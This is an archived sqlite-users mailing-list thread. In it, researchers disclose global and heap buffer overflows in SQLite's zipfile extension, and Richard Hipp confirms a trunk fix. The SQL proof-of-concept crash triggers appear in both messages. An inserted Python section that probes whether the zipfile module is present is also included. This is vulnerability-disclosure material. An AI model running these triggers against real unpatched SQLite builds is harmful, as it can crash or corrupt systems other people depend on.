Re: [sqlite] Buffer Overflow bugs In Sqlite

2019-12-26 Thread Richard Hipp
On 12/26/19, Yongheng Chen wrote:
> Hi,
>
> We found a global buffer overflow and a heap buffer overflow in sqlite.

Thanks for the report.  Now fixed on trunk.

Just to be clear to on-lookers, these problems are in the "zipfile"
extension (https://www.sqlite.org/zipfile.html) not in the SQLite
core.  Zipfile is included as part of the command-line shell, but it
is not included in the SQLite amalgamation, and consequently is
unlikely to be included as part of your application.


> Here’s the POC (trigger with asan):
>
> Global buffer overflow:
> —
> CREATE TABLE v0 ( v6 INTEGER UNIQUE , v5 , v3 , v4 , v2 , v7 , v1 ) ; INSERT
> INTO v0 ( v3 ) VALUES ( 0 ) ,( 10 ) ,( 10.10 ) ,( 10 ) ,( 10 ) ,( 10 )
> ,( 10 ) ,( 10 ) ,( 1 ) ,( 'GERMANY' ) ,( 'LG PKG' ) ,( 'SM PKG' ) ,(
> '%%green%%' ) ,( 'DELIVER IN PERSON' ) ,( 'MED PKG' ) ; SELECT v5 , lag ( v1
> , 10.10 ) OVER( PARTITION BY v1 ORDER BY v5 ) FROM v0 ; ANALYZE v0 ;
> CREATE VIRTUAL TABLE v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE
> NOT NULL UNIQUE ON CONFLICT REPLACE ) ; ANALYZE ; REPLACE INTO v8 SELECT *
> FROM v0 ; SELECT * FROM v0 AS c NATURAL JOIN v0 AS p , v0 NATURAL JOIN v8
> NATURAL JOIN v0 ;
> —
>
> Heap buffer overflow:
> —
> CREATE TABLE v0 ( v5 INTEGER UNIQUE , v6 , v7 , v2 , v3 , v4 INTEGER UNIQUE
> ON CONFLICT IGNORE CHECK( 10 ) CHECK( 10 ) , v1 ) ; INSERT INTO v0 ( v4 )
> VALUES ( 10 ) ,( 1 ) ,( 10 ) ; SELECT v4 , lag ( v2 , 0.10 ) OVER(
> PARTITION BY v4 ORDER BY v6 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE v8
> USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ) ;
> ANALYZE ; REPLACE INTO v8 SELECT * FROM v0 ; SELECT * FROM v8 AS c NATURAL
> JOIN v8 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v8 ;
> —
>
> The bug exists in the latest development code of sqlite.
>
> Yongheng & Rui
>


-- 
D. Richard Hipp
d...@sqlite.org
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
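Hipp's point above is that these overflows live in the zipfile virtual-table module, which ships with the command-line shell but not with the amalgamation. The following is an added example, not code from the thread or from the SQLite project, that lets a practitioner confirm which case applies to the SQLite library their application actually links: it tries to instantiate a named virtual-table module in a throw-away in-memory database and distinguishes "no such module" from every other outcome. It assumes Python's bundled sqlite3 module is linked against the library you want to audit; the function names and the probe table name are the example's own.

```python
"""Probe the linked SQLite build for virtual-table modules such as `zipfile`.

Added example (not part of the mailing-list thread). Assumes the SQLite
library loaded by Python's sqlite3 module is the one you want to audit.
"""
import re
import sqlite3

# Only plain identifiers are accepted, so the name can be spliced into the
# statement safely without quoting rules getting in the way.
_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def vtab_module_available(module: str) -> bool:
    """Return True if `module` is a registered virtual-table module.

    Strategy: run CREATE VIRTUAL TABLE ... USING <module> against a fresh
    in-memory database. SQLite reports an unregistered module with the error
    text "no such module: <name>"; any other outcome (success, or a
    constructor complaint such as a missing argument) proves the module is
    compiled into this build.
    """
    if not _NAME_RE.match(module):
        raise ValueError(f"not a plain module name: {module!r}")
    conn = sqlite3.connect(":memory:")
    try:
        try:
            # "probe" is an arbitrary table name used only for this check.
            conn.execute(f"CREATE VIRTUAL TABLE probe USING {module}")
        except sqlite3.OperationalError as exc:
            return not str(exc).startswith("no such module")
        return True
    finally:
        conn.close()


def audit(modules=("zipfile",)) -> dict:
    """Report the library version and, per module, whether it is registered.

    The default checks only `zipfile`, the module named in the thread; pass
    other names to extend the inventory. The result is a plain dict so it can
    be logged or asserted on in a CI job.
    """
    return {
        "sqlite_version": sqlite3.sqlite_version,
        "modules": {name: vtab_module_available(name) for name in modules},
    }


if __name__ == "__main__":
    report = audit()
    print(f"SQLite {report['sqlite_version']}")
    for name, present in report["modules"].items():
        print(f"  {name}: {'present' if present else 'absent'}")
```

A stock Python build reports `zipfile: absent`, matching Hipp's statement that the module is not part of the amalgamation; a build that reports `present` is one where the shell-only extension was compiled in deliberately and therefore needs the trunk fix.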


[sqlite] Buffer Overflow bugs In Sqlite

2019-12-26 Thread Yongheng Chen
Hi, 

We found a global buffer overflow and a heap buffer overflow in sqlite. Here’s 
the POC (trigger with asan):

Global buffer overflow:
—
CREATE TABLE v0 ( v6 INTEGER UNIQUE , v5 , v3 , v4 , v2 , v7 , v1 ) ; INSERT 
INTO v0 ( v3 ) VALUES ( 0 ) ,( 10 ) ,( 10.10 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 
10 ) ,( 10 ) ,( 1 ) ,( 'GERMANY' ) ,( 'LG PKG' ) ,( 'SM PKG' ) ,( '%%green%%' ) 
,( 'DELIVER IN PERSON' ) ,( 'MED PKG' ) ; SELECT v5 , lag ( v1 , 10.10 ) 
OVER( PARTITION BY v1 ORDER BY v5 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE 
v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ON 
CONFLICT REPLACE ) ; ANALYZE ; REPLACE INTO v8 SELECT * FROM v0 ; SELECT * FROM 
v0 AS c NATURAL JOIN v0 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v0 ;
—

Heap buffer overflow:
—
CREATE TABLE v0 ( v5 INTEGER UNIQUE , v6 , v7 , v2 , v3 , v4 INTEGER UNIQUE ON 
CONFLICT IGNORE CHECK( 10 ) CHECK( 10 ) , v1 ) ; INSERT INTO v0 ( v4 ) VALUES ( 
10 ) ,( 1 ) ,( 10 ) ; SELECT v4 , lag ( v2 , 0.10 ) OVER( PARTITION BY v4 
ORDER BY v6 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE v8 USING zipfile ( v9 
PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ) ; ANALYZE ; REPLACE INTO v8 
SELECT * FROM v0 ; SELECT * FROM v8 AS c NATURAL JOIN v8 AS p , v0 NATURAL JOIN 
v8 NATURAL JOIN v8 ;
—

The bug exists in the latest development code of sqlite.

Yongheng & Rui
